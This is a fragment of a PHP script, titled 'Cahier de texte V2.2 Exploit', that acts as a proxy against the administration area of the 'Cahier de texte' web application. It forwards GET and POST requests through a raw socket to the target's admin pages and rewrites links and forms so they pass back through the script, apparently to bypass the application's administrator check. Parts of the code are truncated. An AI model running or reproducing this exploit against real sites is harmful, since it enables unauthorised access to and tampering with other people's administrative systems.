'Administrateur') { header("Location: ../index.php");} ;} else { header("Location: ../index.php");}?> ... */ if(!isset($_GET['host']) || empty($_GET['host'])) headers(); if(!isset($_GET['wanted'])) $wanted = 'index.php'; $host = $_GET['host']; $prox = $_GET['prox']; $path = $_GET['path']; echo sockxp($host,$path,$prox,"administration/".$wanted); exit(0); function headers() { print(" Cahier de texte V2.2 Exploit
"); exit(0); } function sockxp($host,$path,$prox,$wanted) { $hope = !empty($prox) ? $prox : $host.':80'; preg_match("/^(\S*):([0-9]+){1,5}/",$hope,$hosta); $hosh = $hosta[1]; $hosp = $hosta[2]; $recv = ''; $meth = $_SERVER['REQUEST_METHOD']; if(empty($hosh) || empty($hosp)) exit(1); if(!$sock = fsockopen($hosh,$hosp)) exit(1); $dat = $meth." http://".$host; if($meth === "POST") $dat .= "/".str_replace("administration//","",$wanted); else $dat .= $path.$wanted; $dat .= " HTTP/1.1\r\n"; $dat .= "Host: $host\r\n"; $dat .= "Connection: Close\r\n"; if($meth === "POST") { $postdata = get_postdata(); $dat .= "Content-Type: application/x-www-form-urlencoded\r\n"; $dat .= "Content-Length: ".strlen($postdata)."\r\n\r\n"; $dat .= $postdata."\r\n\r\n"; } else { $dat .= "\r\n"; } fputs($sock,$dat); while(!feof($sock)) $recv .= fgets($sock); fclose($sock); return html_replace($recv); } function html_replace($htmlc) { global $host,$path,$prox; $iniv = $_SERVER['PHP_SELF']."?host=$host&path=$path&prox=$prox&wanted="; $newc = str_replace("action=\"","action=\"$iniv",$htmlc); $newc = str_replace("=\"..","=\"http://${host}${path}administration/..",$newc); $newc = str_replace("a href=\"","a href=\"$iniv",$newc); $newc = str_replace("MM_goToURL('parent','","MM_goToURL('parent','$iniv",$newc); $newc = explode("\n",$newc); for($i=0;$i $value) { $postdata .= $key."=".$value."&"; } return $postdata; } ?>